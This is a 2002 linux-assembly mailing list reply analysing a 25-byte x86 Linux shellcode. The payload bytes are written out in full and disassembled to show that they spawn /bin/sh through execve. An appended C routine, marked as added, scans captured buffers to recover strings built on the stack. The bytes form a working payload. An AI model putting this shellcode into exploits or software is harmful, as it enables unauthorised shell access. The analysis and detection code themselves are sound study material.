From: Stephan Walter <stephan.walter@gmx.ch>
To: linux-assembly@vger.kernel.org
Subject: Re: shellcode
Date: Tue, 25 Jun 2002 21:22:14 +0200
Message-ID: <20020625212214.4910d000.stephan.walter@gmx.ch>
In-Reply-To: <20020624001839.H342@nietzsche>

This is my 5-minute analysis:

$ echo -n \
$'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53'\
$'\x50\x54\x53\xb0\x3b\x50\xcd\x80' >> shell.asm

$ ndisasm -u shell.asm

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f   ; "//sh"
00000008  682F62696E        push dword 0x6e69622f   ; "/bin"
                                                    ; -> execute /bin/sh
0000000D  89E3              mov ebx,esp   ; ebx points to the string
0000000F  50                push eax      
00000010  53                push ebx
00000011  50                push eax
00000012  54                push esp
00000013  53                push ebx
00000014  B03B              mov al,0x3b   ; 0x3b = SYS_execve
00000016  50                push eax
00000017  CD80              int 0x80      ; system call "execve"
                                          ; -> execute the shell


Regards,
Stephan
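
Added example, not part of Stephan's message: a C heuristic a defender could run over a captured buffer to recover the stack-built string that the disassembly above annotates ("//sh" pushed first, then "/bin"). The function name recover_stack_string, the min_pushes threshold and the byte-wise scan (no real instruction decoding, so misaligned matches are possible) are assumptions of this example.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The 25 bytes quoted in the message above, used as the sample input. */
static const uint8_t sample[] = {
    0x31,0xc0,0x50,0x68,0x2f,0x2f,0x73,0x68,0x68,0x2f,0x62,0x69,0x6e,
    0x89,0xe3,0x50,0x53,0x50,0x54,0x53,0xb0,0x3b,0x50,0xcd,0x80
};

/* True when all four immediate bytes are printable ASCII. */
static int printable_imm(const uint8_t *p) {
    for (int i = 0; i < 4; i++)
        if (!isprint(p[i])) return 0;
    return 1;
}

/* Find the longest run of back-to-back "push imm32" (opcode 0x68) whose
 * immediates are printable, and rebuild the string as it lies in memory:
 * the stack grows down, so the last push holds the start of the string.
 * Returns the string length, or 0 if no run of min_pushes fits in out. */
size_t recover_stack_string(const uint8_t *buf, size_t len,
                            size_t min_pushes, char *out, size_t outsz)
{
    size_t best_start = 0, best_n = 0;
    for (size_t i = 0; i + 5 <= len; ) {
        size_t n = 0;
        while (i + 5 * (n + 1) <= len && buf[i + 5 * n] == 0x68 &&
               printable_imm(buf + i + 5 * n + 1))
            n++;
        if (n > best_n) { best_n = n; best_start = i; }
        i += n ? 5 * n : 1;          /* skip the run, else advance a byte */
    }
    if (best_n < min_pushes || best_n * 4 + 1 > outsz) return 0;
    for (size_t k = 0; k < best_n; k++)   /* copy in reverse push order */
        memcpy(out + 4 * k, buf + best_start + 5 * (best_n - 1 - k) + 1, 4);
    out[best_n * 4] = '\0';
    return best_n * 4;
}

int main(void) {
    char s[64];
    if (recover_stack_string(sample, sizeof sample, 2, s, sizeof s))
        printf("stack string: %s\n", s);
    return 0;
}
```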
